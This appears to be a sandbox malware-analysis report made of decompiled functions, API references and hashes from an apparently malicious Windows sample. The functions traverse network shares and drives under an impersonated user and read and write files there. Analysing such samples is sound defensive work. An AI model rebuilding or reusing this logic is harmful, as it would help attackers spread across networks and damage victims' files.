							if(WriteFile( *(_t92 + 0x2c), _t92 + 0x104, _v12,  &_v12, _t92) == 0 &&  *[fs:0x34] != 0x3e5) {
								CloseHandle( *(_t92 + 0x2c));
								RtlFreeHeap( *0xcf0a9e, 0, _t92);
							}
							continue;
						}
						 *(_t92 + 8) =  *(_t92 + 0x14);
						 *(_t92 + 0xc) =  *(_t92 + 0x18);
						 *(_t92 + 0x30) = 1;
						if(ReadFile( *(_t92 + 0x2c), _t92 + 0x104, 0x80000,  &_v12, _t92) != 0) {
							L15:
							continue;
						}
						if( *[fs:0x34] != 0x26) {
							if( *[fs:0x34] == 0x3e5) {
								goto L15;
							}
							CloseHandle( *(_t92 + 0x2c));
							RtlFreeHeap( *0xcf0a9e, 0, _t92);
							continue;
						}
						goto L3;
					}
					return _t54;
				}
			}

0x00ce5bd5
0x00ce5be9
0x00ce5bef
0x00ce5bf4
0x00ce5bf4
0x00ce5bf6
0x00ce5bfe
0x00ce5c1e
0x00ce5c21
0x00ce5c30
0x00ce5bd5
0x00ce5be9
0x00ce5bef
0x00ce5bf4
0x00ce5bf4
0x00000000
0x00ce5bf4
0x00000000
0x00ce5bd5
0x00ce5c00
0x00ce5c00
0x00ce5c1c
0x00000000
0x00ce5c38
0x00000000
0x00ce5c43
0x00ce5c45
0x00ce5c4c
0x00ce5c51
0x00ce5ccc
0x00ce5d8a
0x00ce5df2
0x00ce5e6a
0x00000000
0x00ce5e6a
0x00ce5df4
0x00ce5e00
0x00ce5e00
0x00ce5e0f
0x00ce5e20
0x00ce5e26
0x00ce5e42
0x00ce5e42
0x00ce5e4a
0x00ce5e59
0x00ce5e64
0x00000000
0x00ce5e64
0x00ce5d8c
0x00ce5d93
0x00ce5d9a
0x00ce5dbc
0x00ce5dce
0x00ce5ddd
0x00ce5ddd
0x00000000
0x00ce5dbc
0x00ce5ce7
0x00ce5cf0
0x00ce5d09
0x00ce5d12
0x00ce5d22
0x00ce5d25
0x00ce5d2b
0x00ce5d2e
0x00ce5d19
0x00ce5d19
0x00ce5d19
0x00ce5cf2
0x00ce5cf2
0x00ce5cf9
0x00ce5cfd
0x00ce5d00
0x00ce5d00
0x00ce5d51
0x00ce5d63
0x00ce5d72
0x00ce5d72
0x00000000
0x00ce5d51
0x00ce5c59
0x00ce5c5c
0x00ce5c5f
0x00ce5c84
0x00ce5cbf
0x00000000
0x00ce5cbf
0x00ce5c8e
0x00ce5ca0
0x00000000
0x00000000
0x00ce5ca5
0x00ce5cb4
0x00000000
0x00ce5cb4
0x00000000
0x00ce5c90
0x00000000
0x00ce5c45

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,000000FF), ref: 00CE5BE9
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000), ref: 00CE5C14
CloseHandle.KERNEL32(?), ref: 00CE5C21
RtlFreeHeap.NTDLL(00000000,?), ref: 00CE5C30

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: CompletionQueuedStatus$CloseFreeHandleHeapPost
String ID:
API String ID: 3286583680-0
Opcode ID: 5a799fff8f4dd9fffcee09afa1ae546c9dafcbb3c68f62832231a098f5d777ea
Instruction ID: d653c45e1ccebc5af05eb093697cf002d55165f380fd026297135a6d9c62bfc0
Opcode Fuzzy Hash: 5a799fff8f4dd9fffcee09afa1ae546c9dafcbb3c68f62832231a098f5d777ea
Instruction Fuzzy Hash: 7D718FB1500A84EFDF119F56DDC8BBA3BB9FB08718F3002A1E911890A6D7719A84DF52

Uniqueness

Uniqueness Score: -1.00%

Function 00CE7925, Relevance: 24.3, APIs: 16, Instructions: 267
memorythreadnetworkCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00CE7925(wchar_t* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* _t19;
				int _t24;
				int _t29;
				void* _t66;
				void* _t73;
				WCHAR* _t74;
				wchar_t* _t75;

				if(_a4 == 0) {
					return _t19;
				} else {
					_v8 =  *0xcf0dde(0x80000001);
					if( *0xcf07e4 == 0) {
						L8:
						_t73 = 0;
						_t74 = RtlAllocateHeap( *0xcf0a9e, 8, 0x10000);
						_t75 = _a4;
						PathRemoveBackslashW(_t75);
						if(PathIsUNCServerW(_t75) != 0) {
							wcscpy(_t74, _t75);
							_t73 = 1;
							L23:
							if( *0xcf092c != 0) {
								E00CE16D5(0xceb222,  *0xceb21e);
								E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb222, 0, _t74), 0xceb222,  *0xceb21e);
								if( *0xcf07e0 != 1) {
									if( *0xcf07e0 != 2) {
										E00CE16D5(0xceb578,  *0xceb574);
										E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb578, 0, 0), 0xceb578,  *0xceb574);
									} else {
										E00CE16D5(0xceb54c,  *0xceb548);
										E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb54c, 0, 0), 0xceb54c,  *0xceb548);
									}
								} else {
									E00CE16D5(0xceb520,  *0xceb51c);
									E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb520, 0, 0), 0xceb520,  *0xceb51c);
								}
								E00CE16D5(0xceb44c,  *0xceb448);
								E00CE16D5(0xceb47e,  *0xceb47a);
								E00CE16D5(0xceb4ac,  *0xceb4a8);
								E00CE16D5(0xceb4cc,  *0xceb4c8);
								E00CE16D5(0xceb4e8,  *0xceb4e4);
							}
							if( *0xcf07f3 != 0) {
								E00CE16D5(0xceb5c2,  *0xceb5be);
								E00CE16D5(0xceb5d4,  *0xceb5d0);
							}
							if( *0xcf0928 != 0) {
								ImpersonateLoggedOnUser( *0xcf0aa6);
							}
							 *0xcf07ee = 0;
							 *0xcf07f7 = 0;
							if(_t73 == 0) {
								_t29 = E00CE6B07(_t74);
							} else {
								_t29 = E00CE7850(_t74);
							}
							if( *0xcf0928 != 0) {
								_t29 = RevertToSelf();
							}
							if( *0xcf092c != 0) {
								_t29 = E00CE13DA(E00CE13DA(E00CE13DA(E00CE13DA(E00CE13DA(_t29, 0xceb44c,  *0xceb448), 0xceb47e,  *0xceb47a), 0xceb4ac,  *0xceb4a8), 0xceb4cc,  *0xceb4c8), 0xceb4e8,  *0xceb4e4);
							}
							if( *0xcf07f3 != 0) {
								E00CE13DA(E00CE13DA(_t29, 0xceb5c2,  *0xceb5be), 0xceb5d4,  *0xceb5d0);
							}
							RtlFreeHeap( *0xcf0a9e, 0, _t74);
							return  *0xcf0dde(_v8);
						}
						_t24 = PathIsNetworkPathW(_t75);
						if(_t24 != 0) {
							 *_t74 = 0x5c005c;
							_t74[2] = 0x5c003f;
							_t74[4] = 0x4e0055;
							_t74[6] = 0x5c0043;
							_t7 =  &(_t75[1]); // 0x4
							_t8 =  &(_t74[8]); // 0x10
							wcscpy(_t8, _t7);
							L19:
							if( *(PathFindExtensionW(_t74)) == 0) {
								PathAddBackslashW(_t74);
							}
							if(_a8 != 0) {
								RtlFreeHeap( *0xcf0a9e, 0, _t75);
							}
							goto L23;
						}
						if(_t75[0] == 0x3a) {
							 *_t74 = 0x5c005c;
							_t74[2] = 0x5c003f;
							_t11 =  &(_t74[4]); // 0x8
							wcscpy(_t11, _t75);
							goto L19;
						}
						if( *_t75 == 0x3f005c && _t75[1] == 0x5c003f && _t75[5] == 0x7b) {
							 *_t74 = 0x5c005c;
							_t74[2] = 0x5c003f;
							_t15 =  &(_t75[2]); // 0x8
							_t16 =  &(_t74[4]); // 0x8
							wcscpy(_t16, _t15);
							goto L19;
						}
						return _t24;
					} else {
						if( *0xcf092c != 0) {
							E00CE16D5(0xceb29e,  *0xceb29a);
							E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb29e, 0, 0), 0xceb29e,  *0xceb29a);
						}
						_t66 = E00CE4819();
						if(_t66 == 0) {
							goto L8;
						} else {
							if( *0xcf092c != 0) {
								E00CE16D5(0xceb2ce,  *0xceb2ca);
								return E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb2ce, 0, 0), 0xceb2ce,  *0xceb2ca);
							}
							return _t66;
						}
					}
				}
			}

0x00ce7934
0x00ce7d58
0x00ce793a
0x00ce7945
0x00ce794f
0x00ce79ed
0x00ce79ed
0x00ce7a02
0x00ce7a04
0x00ce7a08
0x00ce7a17
0x00ce7a1b
0x00ce7a24
0x00ce7af3
0x00ce7afa
0x00ce7b0b
0x00ce7b33
0x00ce7b3f
0x00ce7b83
0x00ce7bcb
0x00ce7bf4
0x00ce7b85
0x00ce7b90
0x00ce7bb9
0x00ce7bb9
0x00ce7b41
0x00ce7b4c
0x00ce7b75
0x00ce7b75
0x00ce7c04
0x00ce7c14
0x00ce7c24
0x00ce7c34
0x00ce7c44
0x00ce7c44
0x00ce7c50
0x00ce7c5d
0x00ce7c6d
0x00ce7c6d
0x00ce7c79
0x00ce7c81
0x00ce7c81
0x00ce7c87
0x00ce7c8e
0x00ce7c97
0x00ce7ca2
0x00ce7c99
0x00ce7c9a
0x00ce7c9a
0x00ce7cae
0x00ce7cb0
0x00ce7cb0
0x00ce7cbd
0x00ce7d0a
0x00ce7d0a
0x00ce7d16
0x00ce7d33
0x00ce7d33
0x00ce7d41
0x00000000
0x00ce7d4a
0x00ce7a2b
0x00ce7a33
0x00ce7a35
0x00ce7a3b
0x00ce7a42
0x00ce7a49
0x00ce7a50
0x00ce7a54
0x00ce7a58
0x00ce7aca
0x00ce7ad5
0x00ce7ad8
0x00ce7ad8
0x00ce7ae2
0x00ce7aed
0x00ce7aed
0x00000000
0x00ce7ae2
0x00ce7a68
0x00ce7a6a
0x00ce7a70
0x00ce7a78
0x00ce7a7c
0x00000000
0x00ce7a82
0x00ce7a8d
0x00ce7a9f
0x00ce7aa5
0x00ce7aac
0x00ce7ab0
0x00ce7ab4
0x00000000
0x00ce7aba
0x00ce7ac7
0x00ce7955
0x00ce795c
0x00ce7969
0x00ce7992
0x00ce7992
0x00ce7997
0x00ce799e
0x00000000
0x00ce79a0
0x00ce79a7
0x00ce79b4
0x00000000
0x00ce79dd
0x00ce79ea
0x00ce79ea
0x00ce799e
0x00ce794f

APIs

SetThreadExecutionState.KERNEL32(80000001), ref: 00CE793F
RtlAllocateHeap.NTDLL(00000008,00010000), ref: 00CE79FC
PathRemoveBackslashW.SHLWAPI(00000000,?,00000000,?,?,00000000), ref: 00CE7A08
PathIsUNCServerW.SHLWAPI(00000000,?,00000000,?,?,00000000), ref: 00CE7A0F
wcscpy.NTDLL ref: 00CE7A1B
PathIsNetworkPathW.SHLWAPI(00000000,?,00000000,?,?,00000000), ref: 00CE7A2B
wcscpy.NTDLL ref: 00CE7A58
wcscpy.NTDLL ref: 00CE7A7C
PathFindExtensionW.SHLWAPI(00000000,?,00000000), ref: 00CE7ACB
PathAddBackslashW.SHLWAPI(00000000,?,00000000), ref: 00CE7AD8
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE7AED
ImpersonateLoggedOnUser.ADVAPI32(?,00000000), ref: 00CE7C81
RevertToSelf.ADVAPI32(00000000,?,00000000), ref: 00CE7CB0

Part of subcall function 00CE3E63: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002,?,00000000,?,?,00000000), ref: 00CE3E83
Part of subcall function 00CE3E63: RtlAllocateHeap.NTDLL(00000000,00010000), ref: 00CE3E96
Part of subcall function 00CE3E63: _swprintf.NTDLL ref: 00CE3EBB
Part of subcall function 00CE3E63: _swprintf.NTDLL ref: 00CE3ED6
Part of subcall function 00CE3E63: _swprintf.NTDLL ref: 00CE3EF1
Part of subcall function 00CE3E63: _swprintf.NTDLL ref: 00CE3F0C
Part of subcall function 00CE3E63: wcscpy.NTDLL ref: 00CE3F1E
Part of subcall function 00CE3E63: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00CE3F3E
Part of subcall function 00CE3E63: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE3F4F

RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CE7D41
SetThreadExecutionState.KERNEL32(00000000), ref: 00CE7D4A

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$Heap$_swprintfwcscpy$Free$AllocateBackslashExecutionFileStateThread$ExtensionFindImpersonateLoggedNetworkPointerRemoveRevertSelfServerUserWrite
String ID:
API String ID: 1932318006-0
Opcode ID: 69d4e358d79eca58c4350d00fb97f0d34882f0c60b840cfc07fa68245a0af073
Instruction ID: 574259b5320b4b46f9d168290d34ca9a7b82418cf02de3921251e0d5fc488f24
Opcode Fuzzy Hash: 69d4e358d79eca58c4350d00fb97f0d34882f0c60b840cfc07fa68245a0af073
Instruction Fuzzy Hash: 3EA1CC712412C0FBD7127BA3AC4BF7E3B65AB04B15F284125F605254F3DBB21A60EB66

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3C33, Relevance: 21.1, APIs: 14, Instructions: 115
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE3C33(wchar_t* _a4, wchar_t* _a8, intOrPtr _a12) {
				short _v8;
				void* _v12;
				long _v16;
				void* _v20;
				void* _v24;
				signed int _t44;
				void* _t48;
				long _t61;
				wchar_t* _t62;

				_v8 = 0;
				_v16 = 0;
				_v20 = RtlAllocateHeap( *0xcf0a9e, 0, 0x10000);
				if(_v20 == 0) {
					L19:
					return _v8;
				}
				_t62 = _v20;
				wcscpy(_t62, _a8);
				_t44 = wcslen(_t62);
				if( *((short*)(_t62 + _t44 * 2 - 2)) == 0x5c) {
					wcscpy(_t62 + _t44 * 2, _a4);
				} else {
					 *(_t62 + _t44 * 2) = 0x5c;
					_t14 = _t44 * 2; // 0x2
					wcscpy(_t62 + _t14 + 2, _a4);
				}
				if(SetFileAttributesW(_v20, 0x80) != 0) {
					_t48 = CreateFileW(_v20, 0x80000000, 0, 0, 3, 0x80, 0);
					_v12 = _t48;
					if(_v12 != 0xffffffff) {
						_t61 = GetFileSize(_v12, 0);
						if(_t61 != 0) {
							_v24 = RtlAllocateHeap( *0xcf0a9e, 0, _t61);
							if(_v24 != 0) {
								if(ReadFile(_v12, _v24, _t61,  &_v16, 0) != 0) {
									if(_v16 != 0 && RtlComputeCrc32(0xffffffff, _v24, _t61) == _a12) {
										_v8 = 1;
									}
								} else {
									_v8 =  *[fs:0x34];
								}
								RtlFreeHeap( *0xcf0a9e, 0, _v24);
							}
						} else {
							_v8 = 0xffffffff;
						}
						CloseHandle(_v12);
					} else {
						_v8 = _t48;
					}
				} else {
					_v8 =  *[fs:0x34];
				}
				RtlFreeHeap( *0xcf0a9e, 0, _v20);
				goto L19;
			}

0x00ce3c3e
0x00ce3c45
0x00ce3c5f
0x00ce3c66
0x00ce3da0
0x00ce3dab
0x00ce3dab
0x00ce3c6c
0x00ce3c73
0x00ce3c7d
0x00ce3c8c
0x00ce3cae
0x00ce3c8e
0x00ce3c8e
0x00ce3c97
0x00ce3c9c
0x00ce3ca2
0x00ce3cc7
0x00ce3cec
0x00ce3cf2
0x00ce3cf9
0x00ce3d0e
0x00ce3d12
0x00ce3d2c
0x00ce3d33
0x00ce3d4a
0x00ce3d5b
0x00ce3d6e
0x00ce3d6e
0x00ce3d4c
0x00ce3d52
0x00ce3d52
0x00ce3d80
0x00ce3d80
0x00ce3d14
0x00ce3d14
0x00ce3d14
0x00ce3d89
0x00ce3cfb
0x00ce3cfb
0x00ce3cfb
0x00ce3cc9
0x00ce3ccf
0x00ce3ccf
0x00ce3d9a
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 00CE3C59
wcscpy.NTDLL ref: 00CE3C73
wcslen.NTDLL ref: 00CE3C7D
wcscpy.NTDLL ref: 00CE3C9C
wcscpy.NTDLL ref: 00CE3CAE
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?), ref: 00CE3CBF
CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,?), ref: 00CE3CEC
GetFileSize.KERNEL32(000000FF,00000000,?,?,?,?,?), ref: 00CE3D08
CloseHandle.KERNEL32(000000FF,?,?,?,?,?), ref: 00CE3D89
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE3D9A

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Filewcscpy$Heap$AllocateAttributesCloseCreateFreeHandleSizewcslen
String ID:
API String ID: 2491879839-0
Opcode ID: 10a287d708febf302d8d181a997f2c13ac666b6a25d63c197292737198f0fafb
Instruction ID: 85bde86c4c3ee46eca670008ced7465d882f748c2fee8abd895c98c6cd12fa46
Opcode Fuzzy Hash: 10a287d708febf302d8d181a997f2c13ac666b6a25d63c197292737198f0fafb
Instruction Fuzzy Hash: ED417B30A00289FFDB219F95DC0CBBEBB75FB04B15F204224F921A61A1D7726B50DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3E63, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 82
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00CE3E63(void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v8;
				void* _v12;
				void* _t27;
				signed int _t34;
				signed int _t35;
				signed int _t36;
				signed int _t37;
				wchar_t* _t38;
				void* _t40;

				if(_a4 != 0) {
					_push(2);
					SetFilePointerEx(_a4, 0, 0, 0);
					_t27 = RtlAllocateHeap( *0xcf0a9e, 0, 0x10000);
					_v12 = _t27;
					if(_v12 != 0) {
						_t38 = _v12;
						if(_a8 != 0) {
							_t37 =  *0xcf0cfa(_t38, L"[%s] ", _a8);
							_t40 = _t40 + 0xc;
							_t38 = _t38 + _t37 * 2;
						}
						if(_a12 != 0) {
							_t36 =  *0xcf0cfa(_t38, L"%s ", _a12);
							_t40 = _t40 + 0xc;
							_t38 = _t38 + _t36 * 2;
						}
						if(_a16 != 0) {
							_t35 =  *0xcf0cfa(_t38, L"%s ", _a16);
							_t40 = _t40 + 0xc;
							_t38 = _t38 + _t35 * 2;
						}
						if(_a20 != 0) {
							_t34 =  *0xcf0cfa(_t38, L"%s", _a20);
							_t40 = _t40 + 0xc;
							_t38 = _t38 + _t34 * 2;
						}
						wcscpy(_t38, L"\r\n");
						WriteFile(_a4, _v12, E00CE1E9E(_v12),  &_v8, 0);
						return RtlFreeHeap( *0xcf0a9e, 0, _v12);
					}
				}
				return _t27;
			}

0x00ce3e72
0x00ce3e78
0x00ce3e83
0x00ce3e96
0x00ce3e9c
0x00ce3ea3
0x00ce3ea9
0x00ce3eb0
0x00ce3ebb
0x00ce3ec1
0x00ce3ec4
0x00ce3ec4
0x00ce3ecb
0x00ce3ed6
0x00ce3edc
0x00ce3edf
0x00ce3edf
0x00ce3ee6
0x00ce3ef1
0x00ce3ef7
0x00ce3efa
0x00ce3efa
0x00ce3f01
0x00ce3f0c
0x00ce3f12
0x00ce3f15
0x00ce3f15
0x00ce3f1e
0x00ce3f3e
0x00000000
0x00ce3f4f
0x00ce3ea3
0x00ce3f5d

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002,?,00000000,?,?,00000000), ref: 00CE3E83
RtlAllocateHeap.NTDLL(00000000,00010000), ref: 00CE3E96
_swprintf.NTDLL ref: 00CE3EBB
_swprintf.NTDLL ref: 00CE3ED6
_swprintf.NTDLL ref: 00CE3EF1
_swprintf.NTDLL ref: 00CE3F0C
wcscpy.NTDLL ref: 00CE3F1E
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00CE3F3E
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE3F4F

Strings

%s , xrefs: 00CE3EEB
[%s] , xrefs: 00CE3EB5
%s , xrefs: 00CE3ED0

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: _swprintf$FileHeap$AllocateFreePointerWritewcscpy
String ID: %s $%s $[%s]
API String ID: 968603413-822188592
Opcode ID: 58a94cec58e7f3a616a01cef59becf49ec8f0d7c45e34aeaca705d29176d0070
Instruction ID: 5ca39f982b7003f76f0ad760d3b9aa5d4bb050bea5836ed2fad496bc77bbe5f3
Opcode Fuzzy Hash: 58a94cec58e7f3a616a01cef59becf49ec8f0d7c45e34aeaca705d29176d0070
Instruction Fuzzy Hash: F8319671540208FFDB119F95EC8EFBD7B35EB00B02F204160FA05550E2D7B26AA4DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6E33, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 89
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00CE6E33() {
				wchar_t** _v8;
				char _v12;
				char _v16;
				long _v20;
				char _v420;
				char _t18;
				void* _t19;
				char _t31;
				void* _t32;
				char _t33;
				wchar_t** _t35;
				void* _t36;

				if( *0xcf0928 != 0) {
					ImpersonateLoggedOnUser( *0xcf0aa6);
				}
				 *0xcf0f52(0x101,  &_v420);
				_t18 = E00CE6F46(0xcf144c);
				_t31 = _t18;
				while(_t31 != 0) {
					asm("lodsd");
					_t33 = _t18;
					_v20 = 0;
					_t18 =  *0xcf0f4e(_t33, 1,  &_v8, 0xffffffff,  &_v12,  &_v16,  &_v20);
					if(_t18 == 0) {
						_push(0xcf144c);
						_push(_t31);
						_t35 = _v8;
						do {
							if(_t35[1] == 0) {
								_t32 = RtlAllocateHeap( *0xcf0a9e, 8, 0x10000);
								 *_t32 = 0x5c005c;
								 *((intOrPtr*)(_t32 + 4)) = 0x5c003f;
								 *((intOrPtr*)(_t32 + 8)) = 0x4e0055;
								 *((intOrPtr*)(_t32 + 0xc)) = 0x5c0043;
								_t12 = _t33 + 4; // 0x4
								wcscat(_t32, _t12);
								wcscat(_t32,  *_t35);
								_t36 = _t36 + 0x10;
								E00CE6B07(_t32);
								_t18 = RtlFreeHeap( *0xcf0a9e, 0, _t32);
							}
							_t35 =  &(_t35[3]);
							_v12 = _v12 - 1;
						} while (_v12 != 0);
						_pop(_t31);
						_pop(0xcf144c);
					}
					_t31 = _t31 - 1;
				}
				_t19 =  *0xcf0f56();
				if( *0xcf0928 != 0) {
					return RevertToSelf();
				}
				return _t19;
			}

0x00ce6e48
0x00ce6e50
0x00ce6e50
0x00ce6e62
0x00ce6e6f
0x00ce6e74
0x00ce6e78
0x00ce6e7e
0x00ce6e7f
0x00ce6e81
0x00ce6e9d
0x00ce6ea5
0x00ce6ea7
0x00ce6ea8
0x00ce6ea9
0x00ce6eac
0x00ce6eb0
0x00ce6ec5
0x00ce6ec7
0x00ce6ecd
0x00ce6ed4
0x00ce6edb
0x00ce6ee2
0x00ce6ee7
0x00ce6ef3
0x00ce6ef9
0x00ce6efd
0x00ce6f0b
0x00ce6f0b
0x00ce6f11
0x00ce6f14
0x00ce6f17
0x00ce6f1d
0x00ce6f1e
0x00ce6f1e
0x00ce6f1f
0x00ce6f20
0x00ce6f28
0x00ce6f35
0x00000000
0x00ce6f37
0x00ce6f45

APIs

ImpersonateLoggedOnUser.ADVAPI32(?,?,?,?,00000000), ref: 00CE6E50
WSAStartup.WS2_32(00000101,?), ref: 00CE6E62
RtlAllocateHeap.NTDLL(00000008,00010000,00000000), ref: 00CE6EBF
wcscat.NTDLL ref: 00CE6EE7
wcscat.NTDLL ref: 00CE6EF3
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CE6F0B
WSACleanup.WS2_32 ref: 00CE6F28
RevertToSelf.ADVAPI32(?,?,?,?,?,00000000), ref: 00CE6F37

Strings

C, xrefs: 00CE6EDB
U, xrefs: 00CE6ED4
?, xrefs: 00CE6ECD

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heapwcscat$AllocateCleanupFreeImpersonateLoggedRevertSelfStartupUser
String ID: ?$C$U
API String ID: 4221210675-1379309415
Opcode ID: 164713e6c5cec5177ece6b9072302ceefa2754607a40e2268e47dab9b4966980
Instruction ID: 916d2d5478d1c3b1da664ecd2fd85a34cc786c0695c10ca59f86104b32f7172c
Opcode Fuzzy Hash: 164713e6c5cec5177ece6b9072302ceefa2754607a40e2268e47dab9b4966980
Instruction Fuzzy Hash: 3431CE71500204EFEB10DFD1EC88BBE7BBDFB04B51F600125F918A20A2DBB15A84CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3690, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00CE3690(void* __fp0) {
				char _v16;
				char* _v20;
				char* _v24;
				intOrPtr _v28;
				char _v61;
				char _v69;
				int _t31;
				char _t34;
				signed int _t35;
				int _t44;
				void* _t62;

				_t62 = __fp0;
				_v20 = 0;
				_v24 = 0;
				_v20 = E00CE1AEC(0xcebb77);
				if(_v20 != 0) {
					_t44 = strlen(_v20);
					while(1) {
						asm("lodsw");
						if(0 == 0) {
							break;
						}
						asm("stosb");
					}
					asm("stosb");
					_t31 = strlen( &_v61);
					_t8 = _t44 + _t31 + strlen("060108efb510c98") + 0x40; // 0x40
					_t34 = RtlAllocateHeap( *0xcf0a9e, 8, _t8);
					_v24 = _t34;
					if(_v24 != 0) {
						_t35 =  *0xcf0ab2; // 0x56ea
						asm("wait");
						asm("fninit");
						asm("fild qword [0xcf0ab6]");
						_v28 = 0x40000000;
						asm("fild dword [ebp-0x18]");
						asm("fdivp st1, st0");
						[tword [ebp-0xc] = _t62;
						E00CE1000( &_v16, 2,  &_v69, 2);
						_t34 = E00CE31EE(_v24, sprintf(_v24, _v20,  &_v61, "060108efb510c98",  *0xcf0aaa,  &_v69,  *0xcf0aae, _t35 / 0x3e8, _t35 % 0x3e8));
					}
				} else {
				}
				if(_v20 != 0) {
					_t34 = RtlFreeHeap( *0xcf0a9e, 0, _v20);
				}
				if(_v24 != 0) {
					return RtlFreeHeap( *0xcf0a9e, 0, _v24);
				}
				return _t34;
			}

0x00ce3690
0x00ce369b
0x00ce36a2
0x00ce36b3
0x00ce36ba
0x00ce36cd
0x00ce36da
0x00ce36da
0x00ce36df
0x00000000
0x00000000
0x00ce36e4
0x00ce36e4
0x00ce36e1
0x00ce36eb
0x00ce3706
0x00ce3712
0x00ce3718
0x00ce371f
0x00ce3723
0x00ce3735
0x00ce3736
0x00ce3738
0x00ce373e
0x00ce3745
0x00ce3748
0x00ce374a
0x00ce3759
0x00ce378c
0x00ce378c
0x00000000
0x00ce36bc
0x00ce3795
0x00ce37a2
0x00ce37a2
0x00ce37ac
0x00000000
0x00ce37b9
0x00ce37c7

APIs

